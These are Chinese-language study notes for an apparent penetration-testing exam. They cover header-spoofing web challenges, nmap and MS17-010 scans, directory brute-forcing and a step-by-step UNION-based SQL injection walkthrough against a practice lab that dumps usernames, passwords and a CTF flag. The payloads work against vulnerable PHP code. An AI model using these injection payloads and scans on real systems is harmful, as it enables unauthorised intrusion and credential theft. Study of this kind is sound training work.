100

20分理论题目

80分实操题目

20分理论
基础知识的积累

50 + 30
50 小题。5个题目 5个key。
sql注入
文件上传
命令执行
文件包含
cookie
xss

30 综合大题。3个key
综合渗透
web挖掘漏洞 端口渗透
webshell
权限提升
windows提权。sqlserver xp_cmdshell
linux提权 suid

请求包:

1
2
3
4
5
6
7
8
9
10
11
GET /challenges HTTP/1.1
Host: hazelshishuaige.club:8000
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://hazelshishuaige.club:8000/users
Accept-Language: zh-CN,zh;q=0.9
Cookie: session=942c2275-7738-45eb-aaaa-50a292479bc3.q1uHQ9BkyvBDdzL02e9gCf3VVc0
Connection: close


响应包

1
2
3
4
5
6
7
8
9
10
11
12
HTTP/1.1 302 FOUND
Server: gunicorn/19.9.0
Date: Sat, 03 Dec 2022 01:23:35 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 263
Location: http://hazelshishuaige.club:8000/login?next=%2Fchallenges%3F

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>Redirecting...</title>
<h1>Redirecting...</h1>
<p>You should be redirected automatically to target URL: <a href="/login?next=%2Fchallenges%3F">/login?next=%2Fchallenges%3F</a>.  If not click the link.

平台地址:

http://hazelshishuaige.club:8000/

image-20221203093503249

It doesn’t come from ‘https://www.secret.com

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 SomeOne
referer:https://www.secret.com
X-FORWARDED-FOR:127.0.0.1

image-20221203100130987

做到页面提示23333即可

curl hazelshishuaige.club:28001/
–header ‘X-Forwarded-For:127.0.0.1’
–header ‘User-Agent:SniperOJ-Web-Broswer’
–local-port 23333

image-20221203100440828

解题思路:

1
2
3
4
5
6
7
8
9
10
GET / HTTP/1.1
Host: hazelshishuaige.club:28001
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: SniperOJ-Web-Broswer
X-FORWARDED-FOR: 127.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: zh-CN,zh;q=0.9
Cookie: session=c08cbbad-8ccf-4fda-87ce-b6e465f2e9a3.LZAXUrjKkGRIHW_Equ91T5JGlLk
Connection: close

端口

nmap

1
2
3
4
nmap.exe -sS -p- 123.171.255.158


C:\Program Files (x86)\Nmap>nmap.exe -sV -p 22,3301,2377,8000,40355  123.171.255.158

image-20221203114117339

远程桌面

image-20221203115947706

image-20221203120028632

脚本漏洞扫描

1
2
3
4
5
6
7
8
9
10
╭─hazel@hazeldeMacBook-Pro ~/Desktop/pte
╰─$ nmap -p 445 --script=smb-vuln-ms17-010 192.168.0.186
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-03 14:20 CST
Nmap scan report for 192.168.0.186
Host is up (0.0026s latency).

PORT    STATE  SERVICE
445/tcp closed microsoft-ds

Nmap done: 1 IP address (1 host up) scanned in 0.28 seconds

目录

御剑

御剑扫描

dirsearch

1
2
╭─hazel@hazeldeMacBook-Pro ~/tool/dirscan/dirsearch-master
╰─$ python3.8 dirsearch.py -u http://hazelshishuaige.club:28053/ -e * -t 2 -x 400-500

数据库的操作

增删改查

1
2
3
4
5
insert
drop
delete
update
select

数据库登陆:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
# mysql -uroot -proot -h 127.0.0.1

mysql> show databases; # 显示所有数据库
+--------------------+
| Database           |
+--------------------+
| information_schema | # mysql 安装成功后 自带 库里面有所有数据库的的信息
| ceshi              |
| mysql              |# mysql 自带的数据库
| performance_schema |# 自带的数据库
| security           |
+--------------------+
5 rows in set (0.00 sec)

mysql> use security # 使用 mysql指定的数据库。use dataname;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed

mysql> show tables; # 显示当前数据库下的所有数据表
+--------------------+
| Tables_in_security |
+--------------------+
| emails             |
| referers           |
| uagents            |
| users              |
+--------------------+
4 rows in set (0.00 sec)


mysql> desc users; # 查看指定数据表的结构
+----------+-------------+------+-----+---------+----------------+
| Field    | Type        | Null | Key | Default | Extra          |
+----------+-------------+------+-----+---------+----------------+
| id       | int(3)      | NO   | PRI | NULL    | auto_increment |
| username | varchar(20) | NO   |     | NULL    |                |
| password | varchar(20) | NO   |     | NULL    |                |
+----------+-------------+------+-----+---------+----------------+
3 rows in set (0.00 sec)



mysql> select * from users; # 查询的所有表的信息
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
|  1 | Dumb     | Dumb       |
|  2 | Angelina | I-kill-you |
|  3 | Dummy    | p@ssword   |
|  4 | secure   | crappy     |
|  5 | stupid   | stupidity  |
|  6 | superman | genious    |
|  7 | batman   | mob!le     |
|  8 | admin    | admin      |
+----+----------+------------+
8 rows in set (0.00 sec)



mysql> select username from users; # 查询指定数据表的所有字段名=username的值
+----------+
| username |
+----------+
| Dumb     |
| Angelina |
| Dummy    |
| secure   |
| stupid   |
| superman |
| batman   |
| admin    |
+----------+
8 rows in set (0.00 sec)


mysql> select * from users where username='admin'; # 查询users表里面的 字段名为admin的所有信息
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  8 | admin    | admin    |
+----+----------+----------+
1 row in set (0.00 sec)

select * from users where username=admin and password = admin;
mysql> select * from users where username='admin' and password='admin';
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  8 | admin    | admin    |
+----+----------+----------+
1 row in set (0.00 sec)

mysql> select * from users where username='admin' and password='admn';
Empty set (0.00 sec)
$name 变量

1
2
3
4
5
6
7
8
<?php
$name = $_GET['username'];
$pass = $_GET['password'];
if preg_match(){
  
}
$sql = "select * from users where username=".$name." and password = "."$pass".";
mysqli_query($sql);
1
2
3
4
5
6
7
8
9
10
11
12
$name = $_GET['username']; # 接收参数的变量 接收get请求的变量 url地址看见请求的参数
$pass = $_GET['password']
select * from users where username=$name and password = $pass;

http://www.baidu.com/index.php?username=admin&password=pass
?username=admin&password=pass get请求的传递参数方式

$_POST['username']

请求体里面传递,看不见 请求的参数,前端的html表单进行传递

$_REQUEST[cmd] 等价于 $_GET, $_POST

select查询,同时执行两条sql语句

  1. union select 联合查询 – web

    两条语句

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
select * from users where id =1 union select * from users where id =2 
# 执行的是两条查询语句
# 限制条件 ** 查出来的结果,列数必须相等

mysql> select * from users where id = 1; # 列数 数量
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | Dumb     | Dumb     |
+----+----------+----------+
1 row in set (0.00 sec)

mysql> select * from users where id = 1 union select * from users where id =2;
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
|  1 | Dumb     | Dumb       |
|  2 | Angelina | I-kill-you |
+----+----------+------------+
2 rows in set (0.00 sec)

mysql> select * from users where id = 1 union select username from users where id =2;
ERROR 1222 (21000): The used SELECT statements have a different number of columns

mysql> select password from users where id = 1 union select username from users where id =2;
+----------+
| password |
+----------+
| Dumb     |
| Angelina |
+----------+
2 rows in set (0.00 sec)

mysql> select password from users where id = 1 union select email_id from emails where id =2;
+------------------+
| password         |
+------------------+
| Dumb             |
| Angel@iloveu.com |
+------------------+
2 rows in set (0.00 sec)
  1. ;进行分割 – 堆叠注入
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
; 可以执行多条sql语句

mysql> show databases; select version();
+--------------------+
| Database           |
+--------------------+
| information_schema |
| ceshi              |
| mysql              |
| performance_schema |
| security           |
+--------------------+
5 rows in set (0.00 sec)

+-------------------------+
| version()               |
+-------------------------+
| 5.5.61-0ubuntu0.14.04.1 |
+-------------------------+
1 row in set (0.00 sec)





mysql> show databases; select version();select database();
+--------------------+
| Database           |
+--------------------+
| information_schema |
| ceshi              |
| mysql              |
| performance_schema |
| security           |
+--------------------+
5 rows in set (0.00 sec)

+-------------------------+
| version()               |
+-------------------------+
| 5.5.61-0ubuntu0.14.04.1 |
+-------------------------+
1 row in set (0.00 sec)

+------------+
| database() |
+------------+
| security   |
+------------+
1 row in set (0.00 sec)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
...........
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

	if($row)
	{
  	echo '<font size="5" color="#FFFF00">';	
  	echo 'You are in...........';
  	echo "<br>";
    	echo "</font>";
  	}
	else 
	{
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
SELECT * FROM users WHERE id='$id' LIMIT 0,1
select * from users where id='$id' limit 0,1

select * from users where id='1' limit 0,1;
limit 0,1 限制输出 位数
mysql> select * from users where id='1'  #limit 0,1
    -> ;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | Dumb     | Dumb     |
+----+----------+----------+
1 row in set (0.00 sec)


select * from users where id='1'';  sql语句报错
select * from users where id='1';#';  sql语句报错
# sql注释符号 常见的注释符号 # --+ -- 空格。-- +   or 1=1
mysql> select * from users where id='1';#'; 
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | Dumb     | Dumb     |
+----+----------+----------+
1 row in set (0.00 sec)

mysql> select * from users where id='1';-- + sfjka'skf;as;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | Dumb     | Dumb     |
+----+----------+----------+
1 row in set (0.00 sec)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
mysql> select * from users where username='admin' and 1=1;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  8 | admin    | admin    |
+----+----------+----------+
1 row in set (0.00 sec)

mysql> select * from users where username='admin' and 1=2;
Empty set (0.00 sec)

mysql> select * from users where username=1 or 1=1  or 1=2;
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
|  1 | Dumb     | Dumb       |
|  2 | Angelina | I-kill-you |
|  3 | Dummy    | p@ssword   |
|  4 | secure   | crappy     |
|  5 | stupid   | stupidity  |
|  6 | superman | genious    |
|  7 | batman   | mob!le     |
|  8 | admin    | admin      |
+----+----------+------------+
8 rows in set (0.00 sec)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
...........
  $id = $_GET[id];
// ?id=123
// ?id=123'
// ?id=123'#
$sql="SELECT * FROM users WHERE id='123'' LIMIT 0,1";
// 执行的sql语句 SELECT * FROM users WHERE id='123'' LIMIT 0,1
//执行的sql语句 SELECT * FROM users WHERE id='123'  # ' LIMIT 0,1
// 执行的sql语句 SELECT * FROM users WHERE id='123' union select ....   1. 不知道列数 2. key flag
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

	if($row)
	{
  	echo '<font size="5" color="#FFFF00">';	
  	echo 'You are in...........';
  	echo "<br>";
    	echo "</font>";
  	}
	else 
	{

判断列数:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
mysql> select * from users order by 3;
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
|  8 | admin    | admin      |
|  4 | secure   | crappy     |
|  1 | Dumb     | Dumb       |
|  6 | superman | genious    |
|  2 | Angelina | I-kill-you |
|  7 | batman   | mob!le     |
|  3 | Dummy    | p@ssword   |
|  5 | stupid   | stupidity  |
+----+----------+------------+
8 rows in set (0.00 sec)

mysql> select * from users order by 4;
ERROR 1054 (42S22): Unknown column '4' in 'order clause'


SELECT * FROM users WHERE id='123' union select 1,2,3

如果在数据库中,# 代表注释作用,web #进行url编码%23

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
http://hazelshishuaige.club:9901/Less-1/?id=1'order by 1%23
http://hazelshishuaige.club:9901/Less-1/?id=1'order by 10%23
http://hazelshishuaige.club:9901/Less-1/?id=1'order by 4%23

mysql> select * from users where id =1 union select 1,2,3;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | Dumb     | Dumb     |
|  1 | 2        | 3        |
+----+----------+----------+
2 rows in set (0.00 sec)
mysql> select * from users where id =1.1 union select 1,2,3;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | 2        | 3        |
+----+----------+----------+
1 row in set (0.00 sec)

http://hazelshishuaige.club:9901/Less-1/?id=-1'union select 1,2,3%23
  1. version() 查看数据库版本
  2. user() 数据库⽤户
  3. database() 当前正在使⽤的数据库名
  4. @@datadir 数据库路径
  5. @@version_compile_os 操作系统版本

http://hazelshishuaige.club:9901/Less-1/?id=-1’union select 1,2,database()%23

Flag,key

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
1. 数据库名
| def           | security           | emails                                       | BASE TABLE  | InnoDB             |      10 | Compact    |          8 |           2048 |       16384 |                  0 |            0 |  10485760 |              9 | 2022-12-03 14:46:02 | NULL                | NULL                | latin1_swedish_ci |     NULL |                 |                                                   |
| def           | security           | referers                                     | BASE TABLE  | InnoDB             |      10 | Compact    |          0 |              0 |       16384 |                  0 |            0 |  10485760 |              1 | 2022-12-03 14:46:02 | NULL                | NULL                | latin1_swedish_ci |     NULL |                 |                                                   |
| def           | security           | uagents                                      | BASE TABLE  | InnoDB             |      10 | Compact    |          0 |              0 |       16384 |                  0 |            0 |  10485760 |              1 | 2022-12-03 14:46:02 | NULL                | NULL                | latin1_swedish_ci |     NULL |                 |                                                   |
| def           | security           | users                                        | BASE TABLE  | InnoDB             |      10 | Compact    |          8 |           2048 |       16384 |                  0 |            0 |  10485760 |              9 | 2022-12-03 14:46:02 | NULL                | NULL                | latin1_swedish_ci |     NULL |                 |                                                   |
+---------------+--------------------+----------------------------------------------+-------------+--------------------+---------+------------+------------+----------------+-------------+--------------------+--------------+-----------+----------------+---------------------+---------------------+---------------------+-------------------+----------+-----------------+---------------------------------------------------+
85 rows in set (0.00 sec)

group_concat() 字符串聚合函数

mysql> select * from users where id =1.1 union select 1,2,group_concat(schema_name) from information_schema.schemata;
+----+----------+------------------------------------------------------------+
| id | username | password                                                   |
+----+----------+------------------------------------------------------------+
|  1 | 2        | information_schema,ceshi,mysql,performance_schema,security |
+----+----------+------------------------------------------------------------+
1 row in set (0.00 sec)

mysql> select * from users where id =1.1 union select 1,2,concat(schema_name) from information_schema.schemata;
+----+----------+--------------------+
| id | username | password           |
+----+----------+--------------------+
|  1 | 2        | information_schema |
|  1 | 2        | ceshi              |
|  1 | 2        | mysql              |
|  1 | 2        | performance_schema |
|  1 | 2        | security           |
+----+----------+--------------------+
5 rows in set (0.00 sec)
SCHEMATA表名,这个表里面存储所有数据库名的索引

?id=-1'union select 1,2,group_concat(schema_name) from information_schema.schemata %23

http://hazelshishuaige.club:9901/Less-1/?id=-1'union select 1,2,concat(schema_name) from information_schema.schemata limit 1,2 %23


2. 指定数据的表名

?id=-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() %23

'security'
database() 
security
0x7365637572697479

?id=-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='information_schema' %23


3. 指定数据库的指定表的字段名
?id=-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' %23

Your Login name:2
Your Password:id,username,password

跨裤查询
?id=-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='information_schema' and table_name='tables' %23


TABLE_CATALOG,TABLE_SCHEMA,TABLE_NAME,TABLE_TYPE,ENGINE,VERSION,ROW_FORMAT,TABLE_ROWS,AVG_ROW_LENGTH,DATA_LENGTH,MAX_DATA_LENGTH,INDEX_LENGTH,DATA_FREE,AUTO_INCREMENT,CREATE_TIME,UPDATE_TIME,CHECK_TIME,TABLE_COLLATION,CHECKSUM,CREATE_OPTIONS,TABLE_COMMENT

4 指定数据库的数据表的字段值

?id=-1'union select 1,2,group_concat(id,username,password) from users %23

跨裤查询
?id=-1'union select 1,2,group_concat(VERSION) from information_schema.tables %23

image-20221203164336643

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
id=1'#

id=1' and 1=2 #

SELECT * FROM userinfo WHERE `Id` = '1' and 1=2 #'

常见的闭合符号
'
"
')
")
'))
"))
搜素型注入
'%$id%'

'%1%'   # %'
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
id=1' order by 1#
id=1' order by 4#

id=-1' union select 1,2,3,4#

id=-1' union select 1,2,3,group_concat(schema_name) from information_schema.schemata#

information_schema,mysql,test,performance_schema,hazel

id=-1' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema='hazel'#

id=-1' union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name='flag'#
Id,flag

id=-1' union select 1,2,3,group_concat(id,flag) from flag#
NSCTF{f6c631f294a64dbb1e963f427fdc725d}

image-20221203170235774

附件1
附件2